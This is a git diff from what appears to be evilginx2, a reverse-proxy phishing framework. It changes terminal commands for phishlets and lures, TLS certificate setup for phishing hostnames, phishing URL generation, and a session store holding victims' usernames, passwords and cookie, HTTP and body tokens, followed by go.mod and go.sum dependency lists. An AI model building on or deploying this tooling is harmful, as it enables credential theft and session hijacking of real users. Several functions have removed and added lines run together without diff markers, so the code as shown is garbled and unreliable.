ret += fmt.Sprintf("%s: %s\n", k, white.Sprint(v))
|
||||
}
|
||||
return ret
|
||||
}
|
||||
|
||||
func (t *Terminal) checkStatus() {
|
||||
if t.cfg.GetBaseDomain() == "" {
|
||||
log.Warning("server domain not set! type: config domain <domain>")
|
||||
}
|
||||
if t.cfg.GetServerIP() == "" {
|
||||
log.Warning("server ip not set! type: config ip <ip_address>")
|
||||
log.Warning("server ip not set! type: config ipv4 <ip_address>")
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) updatePhishletCertificates(site string) {
|
||||
for _, s := range t.cfg.GetEnabledSites() {
|
||||
if site == "" || s == site {
|
||||
pl, err := t.cfg.GetPhishlet(s)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
continue
|
||||
}
|
||||
if t.developer {
|
||||
log.Info("developer mode is on - will use self-signed SSL/TLS certificates for phishlet '%s'", s)
|
||||
} else {
|
||||
log.Info("setting up certificates for phishlet '%s'...", s)
|
||||
err = t.crt_db.SetupPhishletCertificate(s, pl.GetPhishHosts())
|
||||
if err != nil {
|
||||
log.Fatal("%v", err)
|
||||
t.cfg.SetSiteDisabled(s)
|
||||
} else {
|
||||
log.Success("successfully set up SSL/TLS certificates for domains: %v", pl.GetPhishHosts())
|
||||
}
|
||||
}
|
||||
func (t *Terminal) manageCertificates(verbose bool) {
|
||||
if !t.p.developer {
|
||||
hosts := t.p.cfg.GetActiveHostnames("")
|
||||
//wc_host := t.p.cfg.GetWildcardHostname()
|
||||
//hosts := []string{wc_host}
|
||||
//hosts = append(hosts, t.p.cfg.GetActiveHostnames("")...)
|
||||
if verbose {
|
||||
log.Info("obtaining and setting up %d TLS certificates - please wait up to 60 seconds...", len(hosts))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) updateLuresCertificates() {
|
||||
for n, l := range t.cfg.lures {
|
||||
if l.Hostname != "" {
|
||||
err := t.updateHostCertificate(l.Hostname)
|
||||
if err != nil {
|
||||
log.Info("clearing hostname for lure %d", n)
|
||||
l.Hostname = ""
|
||||
err := t.cfg.SetLure(n, l)
|
||||
if err != nil {
|
||||
log.Error("edit: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) updateHostCertificate(hostname string) error {
|
||||
|
||||
if t.developer {
|
||||
log.Info("developer mode is on - will use self-signed SSL/TLS certificates for hostname '%s'", hostname)
|
||||
} else {
|
||||
log.Info("setting up certificates for hostname '%s'...", hostname)
|
||||
err := t.crt_db.SetupHostnameCertificate(hostname)
|
||||
err := t.p.crt_db.setManagedSync(hosts, 60*time.Second)
|
||||
if err != nil {
|
||||
return err
|
||||
} else {
|
||||
log.Success("successfully set up SSL/TLS certificates for hostname: %s", hostname)
|
||||
log.Error("failed to set up TLS certificates: %s", err)
|
||||
log.Error("run 'test-certs' command to retry")
|
||||
return
|
||||
}
|
||||
if verbose {
|
||||
log.Info("successfully set up all TLS certificates")
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (t *Terminal) sprintPhishletStatus(site string) string {
|
||||
higreen := color.New(color.FgHiGreen)
|
||||
hired := color.New(color.FgHiRed)
|
||||
hiblue := color.New(color.FgHiBlue)
|
||||
blue := color.New(color.FgBlue)
|
||||
cyan := color.New(color.FgHiCyan)
|
||||
yellow := color.New(color.FgYellow)
|
||||
hiwhite := color.New(color.FgHiWhite)
|
||||
higray := color.New(color.FgWhite)
|
||||
logray := color.New(color.FgHiBlack)
|
||||
n := 0
|
||||
cols := []string{"phishlet", "author", "active", "status", "hostname"}
|
||||
cols := []string{"phishlet", "status", "visibility", "hostname"}
|
||||
var rows [][]string
|
||||
for s, _ := range t.cfg.phishlets {
|
||||
|
||||
var pnames []string
|
||||
for s := range t.cfg.phishlets {
|
||||
pnames = append(pnames, s)
|
||||
}
|
||||
sort.Strings(pnames)
|
||||
|
||||
for _, s := range pnames {
|
||||
pl := t.cfg.phishlets[s]
|
||||
if site == "" || s == site {
|
||||
pl, err := t.cfg.GetPhishlet(s)
|
||||
_, err := t.cfg.GetPhishlet(s)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
|
||||
status := hired.Sprint("disabled")
|
||||
if t.cfg.IsSiteEnabled(s) {
|
||||
status := logray.Sprint("disabled")
|
||||
if pl.isTemplate {
|
||||
status = yellow.Sprint("template")
|
||||
} else if t.cfg.IsSiteEnabled(s) {
|
||||
status = higreen.Sprint("enabled")
|
||||
}
|
||||
hidden_status := higreen.Sprint("available")
|
||||
hidden_status := higray.Sprint("visible")
|
||||
if t.cfg.IsSiteHidden(s) {
|
||||
hidden_status = hired.Sprint("hidden")
|
||||
hidden_status = logray.Sprint("hidden")
|
||||
}
|
||||
domain, _ := t.cfg.GetSiteDomain(s)
|
||||
n += 1
|
||||
|
||||
rows = append(rows, []string{hiblue.Sprint(s), hiwhite.Sprint(pl.Author), status, hidden_status, yellow.Sprint(domain)})
|
||||
if s == site {
|
||||
var param_names string
|
||||
for k, v := range pl.customParams {
|
||||
if len(param_names) > 0 {
|
||||
param_names += "; "
|
||||
}
|
||||
param_names += k
|
||||
if v != "" {
|
||||
param_names += ": " + v
|
||||
}
|
||||
}
|
||||
|
||||
keys := []string{"phishlet", "parent", "status", "visibility", "hostname", "params"}
|
||||
vals := []string{hiblue.Sprint(s), blue.Sprint(pl.ParentName), status, hidden_status, cyan.Sprint(domain), logray.Sprint(param_names)}
|
||||
return AsRows(keys, vals)
|
||||
} else if site == "" {
|
||||
rows = append(rows, []string{hiblue.Sprint(s), status, hidden_status, cyan.Sprint(domain)})
|
||||
}
|
||||
}
|
||||
}
|
||||
return AsTable(cols, rows)
|
||||
}
|
||||
|
||||
func (t *Terminal) sprintIsEnabled(enabled bool) string {
|
||||
logray := color.New(color.FgHiBlack)
|
||||
normal := color.New(color.Reset)
|
||||
|
||||
if enabled {
|
||||
return normal.Sprint("true")
|
||||
} else {
|
||||
return logray.Sprint("false")
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) sprintLures() string {
|
||||
higreen := color.New(color.FgHiGreen)
|
||||
green := color.New(color.FgGreen)
|
||||
@ -1191,7 +1253,7 @@ func (t *Terminal) sprintLures() string {
|
||||
hcyan := color.New(color.FgHiCyan)
|
||||
white := color.New(color.FgHiWhite)
|
||||
//n := 0
|
||||
cols := []string{"id", "phishlet", "hostname", "path", "template", "ua_filter", "redirect_url", "og"}
|
||||
cols := []string{"id", "phishlet", "hostname", "path", "redirector", "ua_filter", "redirect_url", "og"}
|
||||
var rows [][]string
|
||||
for n, l := range t.cfg.lures {
|
||||
var og string
|
||||
@ -1215,7 +1277,7 @@ func (t *Terminal) sprintLures() string {
|
||||
} else {
|
||||
og += "-"
|
||||
}
|
||||
rows = append(rows, []string{strconv.Itoa(n), hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Template), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), og})
|
||||
rows = append(rows, []string{strconv.Itoa(n), hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Redirector), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), og})
|
||||
}
|
||||
return AsTable(cols, rows)
|
||||
}
|
||||
@ -1224,8 +1286,8 @@ func (t *Terminal) phishletPrefixCompleter(args string) []string {
|
||||
return t.cfg.GetPhishletNames()
|
||||
}
|
||||
|
||||
func (t *Terminal) templatesPrefixCompleter(args string) []string {
|
||||
dir := t.cfg.GetTemplatesDir()
|
||||
func (t *Terminal) redirectorsPrefixCompleter(args string) []string {
|
||||
dir := t.cfg.GetRedirectorsDir()
|
||||
|
||||
files, err := ioutil.ReadDir(dir)
|
||||
if err != nil {
|
||||
@ -1233,12 +1295,22 @@ func (t *Terminal) templatesPrefixCompleter(args string) []string {
|
||||
}
|
||||
var ret []string
|
||||
for _, f := range files {
|
||||
if strings.HasSuffix(f.Name(), ".html") || strings.HasSuffix(f.Name(), ".htm") {
|
||||
name := f.Name()
|
||||
if strings.Contains(name, " ") {
|
||||
name = "\"" + name + "\""
|
||||
if f.IsDir() {
|
||||
index_path1 := filepath.Join(dir, f.Name(), "index.html")
|
||||
index_path2 := filepath.Join(dir, f.Name(), "index.htm")
|
||||
index_found := ""
|
||||
if _, err := os.Stat(index_path1); !os.IsNotExist(err) {
|
||||
index_found = index_path1
|
||||
} else if _, err := os.Stat(index_path2); !os.IsNotExist(err) {
|
||||
index_found = index_path2
|
||||
}
|
||||
if index_found != "" {
|
||||
name := f.Name()
|
||||
if strings.Contains(name, " ") {
|
||||
name = "\"" + name + "\""
|
||||
}
|
||||
ret = append(ret, name)
|
||||
}
|
||||
ret = append(ret, name)
|
||||
}
|
||||
}
|
||||
return ret
|
||||
@ -1246,7 +1318,7 @@ func (t *Terminal) templatesPrefixCompleter(args string) []string {
|
||||
|
||||
func (t *Terminal) luresIdPrefixCompleter(args string) []string {
|
||||
var ret []string
|
||||
for n, _ := range t.cfg.lures {
|
||||
for n := range t.cfg.lures {
|
||||
ret = append(ret, strconv.Itoa(n))
|
||||
}
|
||||
return ret
|
||||
@ -1446,7 +1518,7 @@ func (t *Terminal) exportPhishUrls(export_path string, phish_urls []string, phis
|
||||
var param_names []string
|
||||
cols = append(cols, "url")
|
||||
for _, params_row := range phish_params {
|
||||
for k, _ := range params_row {
|
||||
for k := range params_row {
|
||||
if !stringExists(k, param_names) {
|
||||
cols = append(cols, k)
|
||||
param_names = append(param_names, k)
|
||||
@ -1508,7 +1580,7 @@ func (t *Terminal) exportPhishUrls(export_path string, phish_urls []string, phis
|
||||
func (t *Terminal) createPhishUrl(base_url string, params *url.Values) string {
|
||||
var ret string = base_url
|
||||
if len(*params) > 0 {
|
||||
key_arg := GenRandomString(rand.Intn(3) + 1)
|
||||
key_arg := strings.ToLower(GenRandomString(rand.Intn(3) + 1))
|
||||
|
||||
enc_key := GenRandomAlphanumString(8)
|
||||
dec_params := params.Encode()
|
||||
|
@ -4,6 +4,8 @@ import (
|
||||
"crypto/rand"
|
||||
"crypto/sha256"
|
||||
"fmt"
|
||||
"io/fs"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
)
|
||||
|
||||
@ -46,3 +48,30 @@ func CreateDir(path string, perm os.FileMode) error {
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func ReadFromFile(path string) ([]byte, error) {
|
||||
f, err := os.OpenFile(path, os.O_RDONLY, 0644)
|
||||
defer f.Close()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
b, err := ioutil.ReadAll(f)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return b, nil
|
||||
}
|
||||
|
||||
func SaveToFile(b []byte, fpath string, perm fs.FileMode) error {
|
||||
file, err := os.OpenFile(fpath, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, perm)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
_, err = file.Write(b)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
@ -54,8 +54,18 @@ func (d *Database) SetSessionCustom(sid string, name string, value string) error
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *Database) SetSessionTokens(sid string, tokens map[string]map[string]*Token) error {
|
||||
err := d.sessionsUpdateTokens(sid, tokens)
|
||||
func (d *Database) SetSessionBodyTokens(sid string, tokens map[string]string) error {
|
||||
err := d.sessionsUpdateBodyTokens(sid, tokens)
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *Database) SetSessionHttpTokens(sid string, tokens map[string]string) error {
|
||||
err := d.sessionsUpdateHttpTokens(sid, tokens)
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *Database) SetSessionCookieTokens(sid string, tokens map[string]map[string]*CookieToken) error {
|
||||
err := d.sessionsUpdateCookieTokens(sid, tokens)
|
||||
return err
|
||||
}
|
||||
|
||||
|
@ -11,21 +11,23 @@ import (
|
||||
const SessionTable = "sessions"
|
||||
|
||||
type Session struct {
|
||||
Id int `json:"id"`
|
||||
Phishlet string `json:"phishlet"`
|
||||
LandingURL string `json:"landing_url"`
|
||||
Username string `json:"username"`
|
||||
Password string `json:"password"`
|
||||
Custom map[string]string `json:"custom"`
|
||||
Tokens map[string]map[string]*Token `json:"tokens"`
|
||||
SessionId string `json:"session_id"`
|
||||
UserAgent string `json:"useragent"`
|
||||
RemoteAddr string `json:"remote_addr"`
|
||||
CreateTime int64 `json:"create_time"`
|
||||
UpdateTime int64 `json:"update_time"`
|
||||
Id int `json:"id"`
|
||||
Phishlet string `json:"phishlet"`
|
||||
LandingURL string `json:"landing_url"`
|
||||
Username string `json:"username"`
|
||||
Password string `json:"password"`
|
||||
Custom map[string]string `json:"custom"`
|
||||
BodyTokens map[string]string `json:"body_tokens"`
|
||||
HttpTokens map[string]string `json:"http_tokens"`
|
||||
CookieTokens map[string]map[string]*CookieToken `json:"tokens"`
|
||||
SessionId string `json:"session_id"`
|
||||
UserAgent string `json:"useragent"`
|
||||
RemoteAddr string `json:"remote_addr"`
|
||||
CreateTime int64 `json:"create_time"`
|
||||
UpdateTime int64 `json:"update_time"`
|
||||
}
|
||||
|
||||
type Token struct {
|
||||
type CookieToken struct {
|
||||
Name string
|
||||
Value string
|
||||
Path string
|
||||
@ -46,18 +48,20 @@ func (d *Database) sessionsCreate(sid string, phishlet string, landing_url strin
|
||||
id, _ := d.getNextId(SessionTable)
|
||||
|
||||
s := &Session{
|
||||
Id: id,
|
||||
Phishlet: phishlet,
|
||||
LandingURL: landing_url,
|
||||
Username: "",
|
||||
Password: "",
|
||||
Custom: make(map[string]string),
|
||||
Tokens: make(map[string]map[string]*Token),
|
||||
SessionId: sid,
|
||||
UserAgent: useragent,
|
||||
RemoteAddr: remote_addr,
|
||||
CreateTime: time.Now().UTC().Unix(),
|
||||
UpdateTime: time.Now().UTC().Unix(),
|
||||
Id: id,
|
||||
Phishlet: phishlet,
|
||||
LandingURL: landing_url,
|
||||
Username: "",
|
||||
Password: "",
|
||||
Custom: make(map[string]string),
|
||||
BodyTokens: make(map[string]string),
|
||||
HttpTokens: make(map[string]string),
|
||||
CookieTokens: make(map[string]map[string]*CookieToken),
|
||||
SessionId: sid,
|
||||
UserAgent: useragent,
|
||||
RemoteAddr: remote_addr,
|
||||
CreateTime: time.Now().UTC().Unix(),
|
||||
UpdateTime: time.Now().UTC().Unix(),
|
||||
}
|
||||
|
||||
jf, _ := json.Marshal(s)
|
||||
@ -126,12 +130,36 @@ func (d *Database) sessionsUpdateCustom(sid string, name string, value string) e
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *Database) sessionsUpdateTokens(sid string, tokens map[string]map[string]*Token) error {
|
||||
func (d *Database) sessionsUpdateBodyTokens(sid string, tokens map[string]string) error {
|
||||
s, err := d.sessionsGetBySid(sid)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
s.Tokens = tokens
|
||||
s.BodyTokens = tokens
|
||||
s.UpdateTime = time.Now().UTC().Unix()
|
||||
|
||||
err = d.sessionsUpdate(s.Id, s)
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *Database) sessionsUpdateHttpTokens(sid string, tokens map[string]string) error {
|
||||
s, err := d.sessionsGetBySid(sid)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
s.HttpTokens = tokens
|
||||
s.UpdateTime = time.Now().UTC().Unix()
|
||||
|
||||
err = d.sessionsUpdate(s.Id, s)
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *Database) sessionsUpdateCookieTokens(sid string, tokens map[string]map[string]*CookieToken) error {
|
||||
s, err := d.sessionsGetBySid(sid)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
s.CookieTokens = tokens
|
||||
s.UpdateTime = time.Now().UTC().Unix()
|
||||
|
||||
err = d.sessionsUpdate(s.Id, s)
|
||||
|
54
go.mod
54
go.mod
@ -1,25 +1,57 @@
|
||||
module github.com/kgretzky/evilginx2
|
||||
|
||||
go 1.12
|
||||
go 1.18
|
||||
|
||||
require (
|
||||
github.com/chzyer/logex v1.1.10 // indirect
|
||||
github.com/caddyserver/certmagic v0.16.1
|
||||
github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e
|
||||
github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1 // indirect
|
||||
github.com/elazarl/goproxy v0.0.0-20190911111923-ecfe977594f1
|
||||
github.com/fatih/color v1.7.0
|
||||
github.com/elazarl/goproxy v0.0.0-20220529153421-8ea89ba92021
|
||||
github.com/fatih/color v1.13.0
|
||||
github.com/go-acme/lego/v3 v3.1.0
|
||||
github.com/gorilla/mux v1.7.3
|
||||
github.com/inconshreveable/go-vhost v0.0.0-20160627193104-06d84117953b
|
||||
github.com/mattn/go-colorable v0.1.4 // indirect
|
||||
github.com/miekg/dns v1.1.22
|
||||
github.com/miekg/dns v1.1.50
|
||||
github.com/mwitkow/go-http-dialer v0.0.0-20161116154839-378f744fb2b8
|
||||
github.com/spf13/viper v1.4.0
|
||||
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0 // indirect
|
||||
github.com/spf13/viper v1.10.1
|
||||
github.com/tidwall/buntdb v1.1.0
|
||||
github.com/tidwall/gjson v1.3.2 // indirect
|
||||
golang.org/x/net v0.0.0-20220728211354-c7608f3a8462
|
||||
)
|
||||
|
||||
require (
|
||||
github.com/cenkalti/backoff/v3 v3.0.0 // indirect
|
||||
github.com/fsnotify/fsnotify v1.5.1 // indirect
|
||||
github.com/hashicorp/hcl v1.0.0 // indirect
|
||||
github.com/klauspost/cpuid/v2 v2.1.0 // indirect
|
||||
github.com/libdns/libdns v0.2.1 // indirect
|
||||
github.com/magiconair/properties v1.8.6 // indirect
|
||||
github.com/mattn/go-colorable v0.1.12 // indirect
|
||||
github.com/mattn/go-isatty v0.0.14 // indirect
|
||||
github.com/mholt/acmez v1.0.3 // indirect
|
||||
github.com/mitchellh/mapstructure v1.4.3 // indirect
|
||||
github.com/pelletier/go-toml v1.9.4 // indirect
|
||||
github.com/spf13/afero v1.8.1 // indirect
|
||||
github.com/spf13/cast v1.4.1 // indirect
|
||||
github.com/spf13/jwalterweatherman v1.1.0 // indirect
|
||||
github.com/spf13/pflag v1.0.5 // indirect
|
||||
github.com/subosito/gotenv v1.2.0 // indirect
|
||||
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0 // indirect
|
||||
github.com/tidwall/gjson v1.14.0 // indirect
|
||||
github.com/tidwall/grect v0.0.0-20161006141115-ba9a043346eb // indirect
|
||||
github.com/tidwall/match v1.1.1 // indirect
|
||||
github.com/tidwall/pretty v1.2.0 // indirect
|
||||
github.com/tidwall/rtree v0.0.0-20180113144539-6cd427091e0e // indirect
|
||||
github.com/tidwall/tinyqueue v0.0.0-20180302190814-1e39f5511563 // indirect
|
||||
golang.org/x/net v0.0.0-20200707034311-ab3426394381
|
||||
go.uber.org/atomic v1.9.0 // indirect
|
||||
go.uber.org/multierr v1.8.0 // indirect
|
||||
go.uber.org/zap v1.21.0 // indirect
|
||||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect
|
||||
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 // indirect
|
||||
golang.org/x/sys v0.0.0-20220731174439-a90be440212d // indirect
|
||||
golang.org/x/text v0.3.7 // indirect
|
||||
golang.org/x/tools v0.1.12 // indirect
|
||||
gopkg.in/ini.v1 v1.66.4 // indirect
|
||||
gopkg.in/square/go-jose.v2 v2.3.1 // indirect
|
||||
gopkg.in/yaml.v2 v2.4.0 // indirect
|
||||
)
|
||||
|
||||
replace github.com/elazarl/goproxy => github.com/kgretzky/goproxy v0.0.0-20220622134552-7d0e0c658440
|
||||
|
525
go.sum
525
go.sum
@ -1,7 +1,42 @@
|
||||
cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
|
||||
cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
|
||||
cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU=
|
||||
cloud.google.com/go v0.44.1/go.mod h1:iSa0KzasP4Uvy3f1mN/7PiObzGgflwredwwASm/v6AU=
|
||||
cloud.google.com/go v0.44.2/go.mod h1:60680Gw3Yr4ikxnPRS/oxxkBccT6SA1yMk63TGekxKY=
|
||||
cloud.google.com/go v0.44.3/go.mod h1:60680Gw3Yr4ikxnPRS/oxxkBccT6SA1yMk63TGekxKY=
|
||||
cloud.google.com/go v0.45.1/go.mod h1:RpBamKRgapWJb87xiFSdk4g1CME7QZg3uwTez+TSTjc=
|
||||
cloud.google.com/go v0.46.3/go.mod h1:a6bKKbmY7er1mI7TEI4lsAkts/mkhTSZK8w33B4RAg0=
|
||||
cloud.google.com/go v0.50.0/go.mod h1:r9sluTvynVuxRIOHXQEHMFffphuXHOMZMycpNR5e6To=
|
||||
cloud.google.com/go v0.52.0/go.mod h1:pXajvRH/6o3+F9jDHZWQ5PbGhn+o8w9qiu/CffaVdO4=
|
||||
cloud.google.com/go v0.53.0/go.mod h1:fp/UouUEsRkN6ryDKNW/Upv/JBKnv6WDthjR6+vze6M=
|
||||
cloud.google.com/go v0.54.0/go.mod h1:1rq2OEkV3YMf6n/9ZvGWI3GWw0VoqH/1x2nd8Is/bPc=
|
||||
cloud.google.com/go v0.56.0/go.mod h1:jr7tqZxxKOVYizybht9+26Z/gUq7tiRzu+ACVAMbKVk=
|
||||
cloud.google.com/go v0.57.0/go.mod h1:oXiQ6Rzq3RAkkY7N6t3TcE6jE+CIBBbA36lwQ1JyzZs=
|
||||
cloud.google.com/go v0.62.0/go.mod h1:jmCYTdRCQuc1PHIIJ/maLInMho30T/Y0M4hTdTShOYc=
|
||||
cloud.google.com/go v0.65.0/go.mod h1:O5N8zS7uWy9vkA9vayVHs65eM1ubvY4h553ofrNHObY=
|
||||
cloud.google.com/go v0.72.0/go.mod h1:M+5Vjvlc2wnp6tjzE102Dw08nGShTscUx2nZMufOKPI=
|
||||
cloud.google.com/go v0.74.0/go.mod h1:VV1xSbzvo+9QJOxLDaJfTjx5e+MePCpCWwvftOeQmWk=
|
||||
cloud.google.com/go v0.75.0/go.mod h1:VGuuCn7PG0dwsd5XPVm2Mm3wlh3EL55/79EKB6hlPTY=
|
||||
cloud.google.com/go/bigquery v1.0.1/go.mod h1:i/xbL2UlR5RvWAURpBYZTtm/cXjCha9lbfbpx4poX+o=
|
||||
cloud.google.com/go/bigquery v1.3.0/go.mod h1:PjpwJnslEMmckchkHFfq+HTD2DmtT67aNFKH1/VBDHE=
|
||||
cloud.google.com/go/bigquery v1.4.0/go.mod h1:S8dzgnTigyfTmLBfrtrhyYhwRxG72rYxvftPBK2Dvzc=
|
||||
cloud.google.com/go/bigquery v1.5.0/go.mod h1:snEHRnqQbz117VIFhE8bmtwIDY80NLUZUMb4Nv6dBIg=
|
||||
cloud.google.com/go/bigquery v1.7.0/go.mod h1://okPTzCYNXSlb24MZs83e2Do+h+VXtc4gLoIoXIAPc=
|
||||
cloud.google.com/go/bigquery v1.8.0/go.mod h1:J5hqkt3O0uAFnINi6JXValWIb1v0goeZM77hZzJN/fQ=
|
||||
cloud.google.com/go/datastore v1.0.0/go.mod h1:LXYbyblFSglQ5pkeyhO+Qmw7ukd3C+pD7TKLgZqpHYE=
|
||||
cloud.google.com/go/datastore v1.1.0/go.mod h1:umbIZjpQpHh4hmRpGhH4tLFup+FVzqBi1b3c64qFpCk=
|
||||
cloud.google.com/go/pubsub v1.0.1/go.mod h1:R0Gpsv3s54REJCy4fxDixWD93lHJMoZTyQ2kNxGRt3I=
|
||||
cloud.google.com/go/pubsub v1.1.0/go.mod h1:EwwdRX2sKPjnvnqCa270oGRyludottCI76h+R3AArQw=
|
||||
cloud.google.com/go/pubsub v1.2.0/go.mod h1:jhfEVHT8odbXTkndysNHCcx0awwzvfOlguIAii9o8iA=
|
||||
cloud.google.com/go/pubsub v1.3.1/go.mod h1:i+ucay31+CNRpDW4Lu78I4xXG+O1r/MAHgjpRVR+TSU=
|
||||
cloud.google.com/go/storage v1.0.0/go.mod h1:IhtSnM/ZTZV8YYJWCY8RULGVqBDmpoyjwiyrjsg+URw=
|
||||
cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0ZeosJ0Rtdos=
|
||||
cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk=
|
||||
cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs=
|
||||
cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0=
|
||||
cloud.google.com/go/storage v1.14.0/go.mod h1:GrKmX003DSIwi9o29oFT7YDnHYwZoctc3fOKtUw0Xmo=
|
||||
contrib.go.opencensus.io/exporter/ocagent v0.4.12/go.mod h1:450APlNTSR6FrvC3CTRqYosuDstRB9un7SOx2k/9ckA=
|
||||
dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU=
|
||||
github.com/Azure/azure-sdk-for-go v32.4.0+incompatible/go.mod h1:9XXNKU+eRnpl9moKnB4QOLf1HestfXbmab5FXxiDBjc=
|
||||
github.com/Azure/go-autorest/autorest v0.1.0/go.mod h1:AKyIcETwSUFxIcs/Wnq/C+kwCtlEYGUVd7FPNb2slmg=
|
||||
github.com/Azure/go-autorest/autorest v0.5.0/go.mod h1:9HLKlQjVBH6U3oDfsXOeVc56THsLPw1L03yban4xThw=
|
||||
@ -15,9 +50,8 @@ github.com/Azure/go-autorest/autorest/to v0.2.0/go.mod h1:GunWKJp1AEqgMaGLV+iocm
|
||||
github.com/Azure/go-autorest/autorest/validation v0.1.0/go.mod h1:Ha3z/SqBeaalWQvokg3NZAlQTalVMtOIAs1aGK7G6u8=
|
||||
github.com/Azure/go-autorest/logger v0.1.0/go.mod h1:oExouG+K6PryycPJfVSxi/koC6LSNgds39diKLz7Vrc=
|
||||
github.com/Azure/go-autorest/tracing v0.1.0/go.mod h1:ROEEAFwXycQw7Sn3DXNtEedEvdeRAgDr0izn4z5Ij88=
|
||||
github.com/BurntSushi/toml v0.3.1 h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=
|
||||
github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
|
||||
github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU=
|
||||
github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
|
||||
github.com/OpenDNS/vegadns2client v0.0.0-20180418235048-a3fa4a771d87/go.mod h1:iGLljf5n9GjT6kc0HBvyI1nOKnGQbNB66VzSNbK5iks=
|
||||
github.com/Shopify/sarama v1.19.0/go.mod h1:FVkBWblsNy7DGZRfXLU0O9RCGt5g3g3yEuWXgklEdEo=
|
||||
github.com/Shopify/toxiproxy v2.1.4+incompatible/go.mod h1:OXgGpZ6Cli1/URJOF1DMxUHB2q5Ap20/P/eIdh4G0pI=
|
||||
@ -27,16 +61,19 @@ github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRF
|
||||
github.com/aliyun/alibaba-cloud-sdk-go v0.0.0-20190808125512-07798873deee/go.mod h1:myCDvQSzCW+wB1WAlocEru4wMGJxy+vlxHdhegi1CDQ=
|
||||
github.com/aliyun/aliyun-oss-go-sdk v0.0.0-20190307165228-86c17b95fcd5/go.mod h1:T/Aws4fEfogEE9v+HPhhw+CntffsBHJ8nXQCwKr0/g8=
|
||||
github.com/apache/thrift v0.12.0/go.mod h1:cp2SuWMxlEZw2r+iP2GNCdIi4C1qmUzdZFSVb+bacwQ=
|
||||
github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5doyWs3UAsr3K4I6qtAmlQcZDesFNEHPZAzj8=
|
||||
github.com/aws/aws-sdk-go v1.23.0/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
|
||||
github.com/baiyubin/aliyun-sts-go-sdk v0.0.0-20180326062324-cfa1a18b161f/go.mod h1:AuiFmCCPBSrqvVMvuqFuk0qogytodnVFVSN5CeJB8Gc=
|
||||
github.com/benbjohnson/clock v1.1.0 h1:Q92kusRqC1XV2MjkWETPvjJVqKetz1OzxZB7mHJLju8=
|
||||
github.com/benbjohnson/clock v1.1.0/go.mod h1:J11/hYXuz8f4ySSvYwY0FKfm+ezbsZBKZxNJlLklBHA=
|
||||
github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
|
||||
github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8=
|
||||
github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
|
||||
